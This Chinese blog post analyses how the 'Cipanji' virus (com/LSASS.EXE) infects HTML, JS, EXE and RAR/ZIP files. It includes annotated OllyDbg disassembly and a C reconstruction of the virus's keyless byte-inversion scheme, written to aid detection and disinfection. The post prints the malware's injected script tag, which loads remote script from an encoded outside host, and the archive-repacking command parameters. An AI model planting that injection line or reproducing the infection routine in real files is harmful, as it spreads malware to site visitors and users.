
com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 第一博

时间:2019-10-10 10:16:27


com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 第一博

为XXX研究所提供技术支持时截获的样本,com/lsass.exe smss.exe,病毒中文名为磁碟机病毒,貌似很强,此等病毒岂能错过,分析之,不感独乐,遂将感染方式贴上。注意:样本落地路径为 C:/WINDOWS/system32/com/LSASS.EXE(见 00402478 处的字符串),与系统正常的 system32\lsass.exe 同名,只是多了一层 com 子目录,排查进程和文件时务必按完整路径区分。下文反汇编为 OllyDbg 输出(Intel 语法),";" 之后的尾注部分为分析者手工添加。

感染文件类型:(取文件全名最后三个字符,用 _mbsicmp 做不区分大小写的比较,见 004023AD 起的一串比较;因此 .html 以 "tml" 匹配、.htm 以 "htm" 匹配、.js 以 ".js" 匹配)

1 htm、tml(即 .html)、.js —— 仅当文件大小小于 0x19000(100 KB)字节时才感染,见 004023ED 与 00402A61 处的比较

2 .exe —— 长度为 0 的文件以及经 00403088 判定已被感染的文件会被跳过(见 00406418 与 00406455 处的检查),因此不会重复感染

3 .rar, .zip —— 仅当文件大小不超过 0x500000(5 MB)且路径不是 c:/program files/winrar/winrar.exe 自身时处理(见 00402610 与 00402632);感染依赖本机 WinRAR 命令行:先用 " X " 解包到 /bak/ 目录,感染其中文件后再用 " A " 带 -m0 -df -ep -ep1 等参数重新打包(参数串见 00402729 与 004028CC)。[ESI+1AA] 处的计数器进入时加一、退出时减一,推测用于限制嵌套压缩包的递归深度。

web文件感染函数:

1 按行读取web文件内容

2 如果没有找到匹配的:document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>"); 则在文件尾部加上这一句。(百分号编码解码后即 http://js.k0102.com/01.asp;标签名大小写混写推测是为了绕过简单的字符串匹配。由于先做了存在性检查,同一文件不会被重复追加;这段 document.write 片段本身可以直接作为网页文件是否被感染的特征串。)

exe文件感染函数:

被感染的文件包括三个部分(原文件以可逆方式整体追加在病毒体之后,因此可以从被感染文件中完整恢复):

1)被修改图标资源的病毒体

2)被加密的原文件

3)病毒体

1 取C:/WINDOWS/system32/Com/LSASS.EXE文件信息(_stat,见 00406380;取得的文件大小存入 40D03C,随后作为 fread 的读取长度,很可能就是下文伪代码中的 g_dwVFileSize)。

2 读取C:/WINDOWS/system32/Com/LSASS.EXE文件到内存,并修改相应的资源内容,然后写到com/~临时文件中。

3 取待感染文件信息(创建/访问/修改时间;感染完成后通过 SetFileTime 原样写回,见 004025BD 处,所以不能依靠文件时间戳判断文件是否被感染,应比对文件大小或内容特征)。

4 读取待感染文件内容到内存,并进行加密,然后追加到com/~临时文件中。

5 再将C:/WINDOWS/system32/Com/LSASS.EXE文件读入内存,并加密写到com/~临时文件中。

6 将C:/WINDOWS/system32/Com/~临时文件拷贝到被感染文件位置(复制前先经 00401DC1 修改目标文件属性,复制并恢复时间戳后用 _unlink 删除 com/~,见 004025D2)。

//Add on 22:57 -1-9

对EXE的加密算法(实际上只是对固定偏移处的字节按位取反,没有任何密钥;取反是自逆运算,对密文再做一遍同样的变换即可还原原文件):

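/*
 * Reference reconstruction of the byte transform the sample applies to the
 * host EXE (step 4 above) and to the second copy of com/LSASS.EXE (step 5)
 * before appending them to com/~.
 *
 * It is not real encryption: two interleaved passes of bitwise NOT over a
 * chunk, with no key material at all.
 *   pass 1: every EXE_CRYPT_STRIDE1-th byte from dwStart + 9 = 0x224 upward
 *   pass 2: every EXE_CRYPT_STRIDE2-th byte from offset 0 upward (even offsets)
 * A byte hit by both passes is flipped twice and ends up unchanged. Because
 * NOT is its own inverse, running the same transform over the appended
 * payload again yields the original host file, so a disinfection tool needs
 * no key, only the offsets.
 *
 * Differences from the pseudo-code as transcribed on this page (review notes):
 *  - Its first loop only breaks once the offset is *greater* than the chunk
 *    size, so it would touch buf[size]; here the bound is off < size.
 *    Confirm the real jump condition in 00406348 before relying on the very
 *    last byte.
 *  - Its second loop never refreshes dwTmp, which as written would spin on
 *    offset 2 forever; the evident intent (advance by 2) is what is used here.
 *  - Its outer while/bInfect loop transforms only the first fread() chunk and
 *    then reads a second chunk it never touches. exe_crypt_first_chunk keeps
 *    the "first chunk only" behaviour but bounds both passes by the byte count
 *    actually read, not by the requested chunk size, so a short final read
 *    never transforms stale buffer bytes. Whether the binary handles later
 *    chunks differently is not visible on this page; check the write path in
 *    00406348.
 */
#define EXE_CRYPT_START    0x21B   /* dwStart in the original pseudo-code */
#define EXE_CRYPT_SKIP     0x09    /* pass 1 begins at dwStart + 9 */
#define EXE_CRYPT_STRIDE1  0x0B    /* pass 1 step */
#define EXE_CRYPT_STRIDE2  0x02    /* pass 2 step */

/*
 * Apply the keyless NOT transform to buf[0..size) in place.
 * Calling it twice on the same data restores the original bytes.
 *
 * buf:  chunk to transform; may be NULL only when size is 0
 * size: number of valid bytes in buf
 */
void exe_crypt_chunk(unsigned char *buf, size_t size)
{
    size_t off;

    if (buf == NULL || size == 0)
        return;

    /* pass 1: offsets 0x224, 0x22F, 0x23A, ... (stride 11) */
    for (off = EXE_CRYPT_START + EXE_CRYPT_SKIP; off < size; off += EXE_CRYPT_STRIDE1)
        buf[off] = (unsigned char)~buf[off];

    /* pass 2: every even offset */
    for (off = 0; off < size; off += EXE_CRYPT_STRIDE2)
        buf[off] = (unsigned char)~buf[off];
}

/*
 * Read one chunk of at most chunk bytes from file into buf and transform it.
 * This mirrors the transcription's while/bInfect loop, which processes the
 * first chunk only (g_dwVFileSize bytes, presumably the size of com/LSASS.EXE
 * taken by the _stat/fread pair at 00406380/004063DD -- to be confirmed).
 *
 * file:  stream positioned at the data to transform
 * buf:   destination buffer of at least chunk bytes
 * chunk: maximum number of bytes to read
 * Returns the number of bytes read and transformed; 0 on EOF, error or bad
 * arguments.
 */
size_t exe_crypt_first_chunk(FILE *file, unsigned char *buf, size_t chunk)
{
    size_t got;

    if (file == NULL || buf == NULL || chunk == 0)
        return 0;

    got = fread(buf, 1, chunk, file);
    if (got > 0)
        exe_crypt_chunk(buf, got);   /* bound by bytes read, not by chunk */
    return got;
}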

//Add end 22:57 -1-9

具体分析见如下代码及注释:

/

1 遍历文件函数

00402200 |. 8D85 F4FDFFFF LEA EAX,DWORD PTR SS:[EBP-20C]

00402206 |. 50 PUSH EAX ; /pFindFileData

00402207 |. FF75 CC PUSH DWORD PTR SS:[EBP-34] ; |FileName

0040220A |. FF15 08A14000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstFileA>] ; /FindFirstFileA

00402210 |. 6A 01 PUSH 1 ; /RemoveMsg = PM_REMOVE

00402212 |. 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX ; |

00402215 |. 53 PUSH EBX ; |MsgFilterMax

00402216 |. 53 PUSH EBX ; |MsgFilterMin

00402217 |. 8D85 D8FDFFFF LEA EAX,DWORD PTR SS:[EBP-228] ; |

0040221D |. 53 PUSH EBX ; |hWnd

0040221E |. 50 PUSH EAX ; |pMsg

0040221F |. FF15 30A44000 CALL DWORD PTR DS:[<&USER32.PeekMessageA>] ; /PeekMessageA

00402225 |. 837D B8 FF CMP DWORD PTR SS:[EBP-48],-1

00402229 |. 0F84 BC080000 JE LSASS.00402AEB

0040222F |. BF 58E44000 MOV EDI,LSASS.0040E458 ; ASCII "8A;"

00402234 |> 8D85 20FEFFFF /LEA EAX,DWORD PTR SS:[EBP-1E0]

0040223A |. 68 04D14000 |PUSH LSASS.0040D104 ; /s2 = "."

0040223F |. 50 |PUSH EAX ; |s1

00402240 |. E8 0B650000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp

00402245 |. 59 |POP ECX

00402246 |. 85C0 |TEST EAX,EAX

00402248 |. 59 |POP ECX

00402249 |. 0F84 7B080000 |JE LSASS.00402ACA

0040224F |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

00402255 |. 68 00D14000 |PUSH LSASS.0040D100 ; /s2 = ".."

0040225A |. 50 |PUSH EAX ; |s1

0040225B |. E8 F0640000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp

00402260 |. 59 |POP ECX

00402261 |. 85C0 |TEST EAX,EAX

00402263 |. 59 |POP ECX

00402264 |. 0F84 60080000 |JE LSASS.00402ACA

0040226A |. F685 F4FDFFFF 10 |TEST BYTE PTR SS:[EBP-20C],10

00402271 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

...

004023A7 |. 0F86 1D070000 |JBE LSASS.00402ACA

004023AD |. FF75 C4 |PUSH DWORD PTR SS:[EBP-3C] ; /s2 = "tml"

004023B0 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004023B3 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004023B9 |. 59 |POP ECX

004023BA |. 85C0 |TEST EAX,EAX

004023BC |. 59 |POP ECX

004023BD |. 0F84 9E060000 |JE LSASS.00402A61

004023C3 |. FF75 C8 |PUSH DWORD PTR SS:[EBP-38] ; /s2 = "htm"

004023C6 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004023C9 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004023CF |. 59 |POP ECX

004023D0 |. 85C0 |TEST EAX,EAX

004023D2 |. 59 |POP ECX

004023D3 |. 0F84 88060000 |JE LSASS.00402A61

004023D9 |. 68 ACD14000 |PUSH LSASS.0040D1AC ; /s2 = ".js"

004023DE |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004023E1 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004023E7 |. 59 |POP ECX

004023E8 |. 85C0 |TEST EAX,EAX

004023EA |. 59 |POP ECX

004023EB |. 75 6D |JNZ SHORT LSASS.0040245A

004023ED |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000 ; web file infect

004023F7 |. 0F83 CD060000 |JNB LSASS.00402ACA

004023FD |. 51 |PUSH ECX

004023FE |. 8D86 9D010000 |LEA EAX,DWORD PTR DS:[ESI+19D]

00402404 |. 8BCC |MOV ECX,ESP

00402406 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

00402409 |. 50 |PUSH EAX

0040240A |. E8 FB610000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

0040240F |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]

00402412 |. 68 08D14000 |PUSH LSASS.0040D108

00402417 |. 50 |PUSH EAX

00402418 |. 8D85 50FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B0]

0040241E |. 50 |PUSH EAX

0040241F |. C645 FC 11 |MOV BYTE PTR SS:[EBP-4],11

00402423 |. E8 06620000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402428 |. 51 |PUSH ECX

00402429 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

0040242F |. 8BCC |MOV ECX,ESP

00402431 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP

00402434 |. 52 |PUSH EDX

00402435 |. 50 |PUSH EAX

00402436 |. 51 |PUSH ECX

00402437 |. C645 FC 12 |MOV BYTE PTR SS:[EBP-4],12

0040243B |. E8 EE610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402440 |. 8BCE |MOV ECX,ESI

00402442 |. C645 FC 13 |MOV BYTE PTR SS:[EBP-4],13

00402446 |. E8 4C070000 |CALL LSASS.00402B97 ; web file infect function

0040244B |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

0040244F |. 8D8D 50FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B0]

00402455 |. E9 6B060000 |JMP LSASS.00402AC5

0040245A |> 68 A8D14000 |PUSH LSASS.0040D1A8 ; /s2 = "exe"

0040245F |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

00402462 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

00402468 |. 59 |POP ECX

00402469 |. 85C0 |TEST EAX,EAX

0040246B |. 59 |POP ECX

0040246C |. 0F85 6C010000 |JNZ LSASS.004025DE ; exe infect

00402472 |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]

00402478 |. 68 5CE44000 |PUSH LSASS.0040E45C ; ASCII "C:/WINDOWS/system32/com/LSASS.EXE"

0040247D |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX

00402480 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]

00402486 |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX

00402489 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]

0040248F |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX

00402492 |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]

00402498 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX

0040249B |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]

004024A1 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX

004024A4 |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]

004024AA |. 8D8E 78010000 |LEA ECX,DWORD PTR DS:[ESI+178]

004024B0 |. 889E B3010000 |MOV BYTE PTR DS:[ESI+1B3],BL

004024B6 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX

004024B9 |. E8 5E610000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>

004024BE |. 68 A4D14000 |PUSH LSASS.0040D1A4 ; ASCII "/~"

004024C3 |. 8D85 48FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B8]

004024C9 |. 57 |PUSH EDI

004024CA |. 50 |PUSH EAX

004024CB |. E8 5E610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004024D0 |. 8D8E 7C010000 |LEA ECX,DWORD PTR DS:[ESI+17C]

004024D6 |. 50 |PUSH EAX

004024D7 |. C645 FC 14 |MOV BYTE PTR SS:[EBP-4],14

004024DB |. E8 42610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

004024E0 |. 8D8D 48FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B8]

004024E6 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

004024EA |. E8 0D600000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004024EF |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

004024F5 |. 50 |PUSH EAX

004024F6 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]

004024F9 |. 50 |PUSH EAX

004024FA |. 8D85 40FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C0]

00402500 |. 50 |PUSH EAX

00402501 |. E8 28610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402506 |. 8D8E 74010000 |LEA ECX,DWORD PTR DS:[ESI+174]

0040250C |. 50 |PUSH EAX

0040250D |. C645 FC 15 |MOV BYTE PTR SS:[EBP-4],15

00402511 |. E8 0C610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

00402516 |. 8D8D 40FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C0]

0040251C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402520 |. E8 D75F0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402525 |. 8BCE |MOV ECX,ESI

00402527 |. E8 1C3E0000 |CALL LSASS.00406348 ; exe file infect function

0040252C |. 84C0 |TEST AL,AL

0040252E |. 74 04 |JE SHORT LSASS.00402534

00402530 |. C645 EF 01 |MOV BYTE PTR SS:[EBP-11],1

00402534 |> 389E B3010000 |CMP BYTE PTR DS:[ESI+1B3],BL

0040253A |. 0F84 8C000000 |JE LSASS.004025CC

00402540 |. 53 |PUSH EBX

00402541 |. 51 |PUSH ECX

00402542 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]

00402548 |. 8BC4 |MOV EAX,ESP

0040254A |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

0040254D |. 51 |PUSH ECX

0040254E |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]

00402551 |. 51 |PUSH ECX

00402552 |. 50 |PUSH EAX

00402553 |. E8 D6600000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402558 |. E8 64F8FFFF |CALL LSASS.00401DC1 ; setFileAttributes

0040255D |. 59 |POP ECX

0040255E |. 8D86 74010000 |LEA EAX,DWORD PTR DS:[ESI+174]

00402564 |. 8BCC |MOV ECX,ESP

00402566 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

00402569 |. 50 |PUSH EAX

0040256A |. E8 9B600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

0040256F |. 51 |PUSH ECX

00402570 |. 8D86 7C010000 |LEA EAX,DWORD PTR DS:[ESI+17C]

00402576 |. 8BCC |MOV ECX,ESP

00402578 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP

0040257B |. 50 |PUSH EAX

0040257C |. C645 FC 16 |MOV BYTE PTR SS:[EBP-4],16

00402580 |. E8 85600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

00402585 |. 8BCE |MOV ECX,ESI

00402587 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

0040258B |. E8 4E070000 |CALL LSASS.00402CDE ; copy com/~ to original path

00402590 |. 8B86 74010000 |MOV EAX,DWORD PTR DS:[ESI+174]

00402596 |. 53 |PUSH EBX ; /hTemplateFile

00402597 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL

0040259C |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING

0040259E |. 53 |PUSH EBX ; |pSecurity

0040259F |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

004025A1 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE

004025A6 |. 50 |PUSH EAX ; |FileName

004025A7 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA

004025AD |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]

004025B0 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX

004025B3 |. 51 |PUSH ECX ; /pLastWrite

004025B4 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |

004025B7 |. 51 |PUSH ECX ; |pLastAccess

004025B8 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |

004025BB |. 51 |PUSH ECX ; |pCreationTime

004025BC |. 50 |PUSH EAX ; |hFile

004025BD |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime

004025C3 |. FF75 D0 |PUSH DWORD PTR SS:[EBP-30] ; /hObject

004025C6 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle

004025CC |> FFB6 7C010000 |PUSH DWORD PTR DS:[ESI+17C] ; /path

004025D2 |. FF15 58A34000 |CALL DWORD PTR DS:[<&MSVCRT._unlink>] ; /_unlink

004025D8 |. 59 |POP ECX

004025D9 |. E9 EC040000 |JMP LSASS.00402ACA

004025DE |> 68 A0D14000 |PUSH LSASS.0040D1A0 ; /s2 = "rar"

004025E3 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004025E6 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004025EC |. 59 |POP ECX

004025ED |. 85C0 |TEST EAX,EAX

004025EF |. 59 |POP ECX

004025F0 |. 74 18 |JE SHORT LSASS.0040260A

004025F2 |. 68 9CD14000 |PUSH LSASS.0040D19C ; /s2 = "zip"

004025F7 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004025FA |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

00402600 |. 59 |POP ECX

00402601 |. 85C0 |TEST EAX,EAX

00402603 |. 59 |POP ECX

00402604 |. 0F85 C0040000 |JNZ LSASS.00402ACA

0040260A |> 8B86 A6010000 |MOV EAX,DWORD PTR DS:[ESI+1A6]

00402610 |. 68 10F44000 |PUSH LSASS.0040F410 ; /s2 = "c:/program files/winrar/winrar.exe"

00402615 |. 50 |PUSH EAX ; |s1

00402616 |. FF15 A0A34000 |CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; /_mbscmp

0040261C |. 59 |POP ECX

0040261D |. 85C0 |TEST EAX,EAX

0040261F |. 59 |POP ECX

00402620 |. 0F84 A4040000 |JE LSASS.00402ACA

00402626 |. 399E AA010000 |CMP DWORD PTR DS:[ESI+1AA],EBX ; rar, zip file infect

0040262C |. 0F8F 98040000 |JG LSASS.00402ACA

00402632 |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],500000

0040263C |. 0F87 88040000 |JA LSASS.00402ACA

00402642 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

00402648 |. 50 |PUSH EAX

00402649 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]

0040264C |. 50 |PUSH EAX

0040264D |. 8D85 34FFFFFF |LEA EAX,DWORD PTR SS:[EBP-CC]

00402653 |. 50 |PUSH EAX

00402654 |. E8 D55F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402659 |. 50 |PUSH EAX

0040265A |. 8D4D D8 |LEA ECX,DWORD PTR SS:[EBP-28]

0040265D |. C645 FC 17 |MOV BYTE PTR SS:[EBP-4],17

00402661 |. E8 BC5F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

00402666 |. 8D8D 34FFFFFF |LEA ECX,DWORD PTR SS:[EBP-CC]

0040266C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402670 |. E8 875E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402675 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

0040267A |. 8D85 7CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-84]

00402680 |. 57 |PUSH EDI

00402681 |. 50 |PUSH EAX

00402682 |. E8 A75F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402687 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]

0040268D |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18

00402691 |. 51 |PUSH ECX

00402692 |. 50 |PUSH EAX

00402693 |. 8D85 54FFFFFF |LEA EAX,DWORD PTR SS:[EBP-AC]

00402699 |. 50 |PUSH EAX

0040269A |. E8 8F5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040269F |. 68 08D14000 |PUSH LSASS.0040D108

004026A4 |. 50 |PUSH EAX

004026A5 |. 8D45 94 |LEA EAX,DWORD PTR SS:[EBP-6C]

004026A8 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19

004026AC |. 50 |PUSH EAX

004026AD |. E8 7C5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004026B2 |. 50 |PUSH EAX

004026B3 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]

004026B6 |. C645 FC 1A |MOV BYTE PTR SS:[EBP-4],1A

004026BA |. E8 635F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

004026BF |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]

004026C2 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19

004026C6 |. E8 315E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004026CB |. 8D8D 54FFFFFF |LEA ECX,DWORD PTR SS:[EBP-AC]

004026D1 |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18

004026D5 |. E8 225E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004026DA |. 8D8D 7CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-84]

004026E0 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

004026E4 |. E8 135E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004026E9 |. 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]

004026EC |. 50 |PUSH EAX

004026ED |. 8D85 6CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-94]

004026F3 |. 68 8CD14000 |PUSH LSASS.0040D18C ; ASCII " X ""

004026F8 |. 50 |PUSH EAX

004026F9 |. E8 365F0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>

004026FE |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""

00402703 |. 50 |PUSH EAX

00402704 |. 8D85 4CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-B4]

0040270A |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B

0040270E |. 50 |PUSH EAX

0040270F |. E8 1A5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402714 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]

00402717 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C

0040271B |. 51 |PUSH ECX

0040271C |. 50 |PUSH EAX

0040271D |. 8D85 74FFFFFF |LEA EAX,DWORD PTR SS:[EBP-8C]

00402723 |. 50 |PUSH EAX

00402724 |. E8 FF5E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

00402729 |. 68 74D14000 |PUSH LSASS.0040D174 ; ASCII "" -r -inul -ibck -y"

0040272E |. 50 |PUSH EAX

0040272F |. 8D85 3CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-C4]

00402735 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D

00402739 |. 50 |PUSH EAX

0040273A |. E8 EF5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040273F |. C645 FC 1E |MOV BYTE PTR SS:[EBP-4],1E

00402743 |. 50 |PUSH EAX

00402744 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]

00402747 |. E8 D65E0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

0040274C |. 8D8D 3CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-C4]

00402752 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D

00402756 |. E8 A15D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

0040275B |. 8D8D 74FFFFFF |LEA ECX,DWORD PTR SS:[EBP-8C]

00402761 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C

00402765 |. E8 925D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

0040276A |. 8D8D 4CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-B4]

00402770 |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B

00402774 |. E8 835D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402779 |. 8D8D 6CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-94]

0040277F |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402783 |. E8 745D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402788 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]

0040278B |. 50 |PUSH EAX

0040278C |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]

00402792 |. 50 |PUSH EAX

00402793 |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]

00402799 |. 50 |PUSH EAX

0040279A |. E8 895E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

0040279F |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src

004027A1 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

004027A7 |. 50 |PUSH EAX ; |dest

004027A8 |. E8 5F5F0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy

004027AD |. 59 |POP ECX

004027AE |. 59 |POP ECX

004027AF |. 8D8D 38FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C8]

004027B5 |. E8 425D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004027BA |. 53 |PUSH EBX ; /Arg5

004027BB |. 53 |PUSH EBX ; |Arg4

004027BC |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

004027C2 |. 53 |PUSH EBX ; |Arg3

004027C3 |. 50 |PUSH EAX ; |Arg2

004027C4 |. 53 |PUSH EBX ; |Arg1

004027C5 |. 8BCE |MOV ECX,ESI ; |

004027C7 |. E8 2F410000 |CALL LSASS.004068FB ; /LSASS.004068FB

004027CC |. 85C0 |TEST EAX,EAX ; unpack rar/zip file

004027CE |. 74 40 |JE SHORT LSASS.00402810

004027D0 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

